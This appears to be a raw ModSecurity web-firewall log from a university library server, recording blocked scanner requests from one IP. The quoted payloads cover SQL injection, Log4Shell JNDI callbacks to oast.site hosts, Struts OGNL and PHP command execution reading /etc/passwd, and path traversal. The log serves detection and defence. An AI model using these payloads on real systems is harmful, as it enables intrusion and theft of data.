[Tue Aug 29 11:32:05.470924 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQR4-AAAAAz"]
[Tue Aug 29 11:32:06.374567 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQR4-QAAAAz"]
[Tue Aug 29 11:32:06.460469 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQKOd4AAAAs"]
[Tue Aug 29 11:32:07.735352 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQR4-0AAAAz"]
[Tue Aug 29 11:32:08.341230 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQv1lYAAAAA"]
[Tue Aug 29 11:32:10.332033 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg4xbs8ujwtt9yh.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQUIBkAAAA2"]
[Tue Aug 29 11:32:10.412833 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg86j7yhqyqwxxp.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQUIBwAAAA2"]
[Tue Aug 29 11:32:12.366383 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAP8G4YAAAAV"]
[Tue Aug 29 11:32:13.331610 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwq3k84ixbc8ob.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwq3k84ixbc8ob.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQ9H0UAAAAK"]
[Tue Aug 29 11:32:13.359008 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAP5mP0AAAAM"]
[Tue Aug 29 11:32:15.331614 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAN9sT8AAAAJ"]
[Tue Aug 29 11:32:15.407685 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQOv7sAAAAw"]
[Tue Aug 29 11:32:15.409179 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilib.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQNwOYAAAAv"]
[Tue Aug 29 11:32:15.409243 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQNwOYAAAAv"]
[Tue Aug 29 11:32:16.312318 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQnF9QAAAAF"]
[Tue Aug 29 11:32:17.327340 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAQ83SIAAAAI"]
[Tue Aug 29 11:32:18.334754 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQnF94AAAAF"]
[Tue Aug 29 11:32:18.339168 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQKOfoAAAAs"]
[Tue Aug 29 11:32:21.305547 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAANsAacAAAAD"]
[Tue Aug 29 11:32:21.377474 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQ83TUAAAAI"]
[Tue Aug 29 11:32:22.478373 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAARD1NcAAAAH"]
[Tue Aug 29 11:32:23.311561 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQ9H2cAAAAK"]
[Tue Aug 29 11:32:23.351041 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAPiBrYAAAAB"]
[Tue Aug 29 11:32:25.324950 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAQOv9gAAAAw"]
[Tue Aug 29 11:32:25.356808 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPxBYgAAAAS"]
[Tue Aug 29 11:32:27.498881 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAANwN0QAAAAb"]
[Tue Aug 29 11:32:28.404944 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilib.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAQUIF4AAAA2"]
[Tue Aug 29 11:32:30.311301 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARGwdMAAAAL"]
[Tue Aug 29 11:32:31.305167 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARH7HYAAAAM"]
[Tue Aug 29 11:32:32.324703 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARH7HcAAAAM"]
[Tue Aug 29 11:32:32.390592 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXvEAAAAQ"]
[Tue Aug 29 11:32:32.390627 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXvEAAAAQ"]
[Tue Aug 29 11:32:35.356005 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg4e1ybf3rh4w66.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg4e1ybf3rh4w66.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgc3qe59kh46a96.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAAQOv@QAAAAw"]
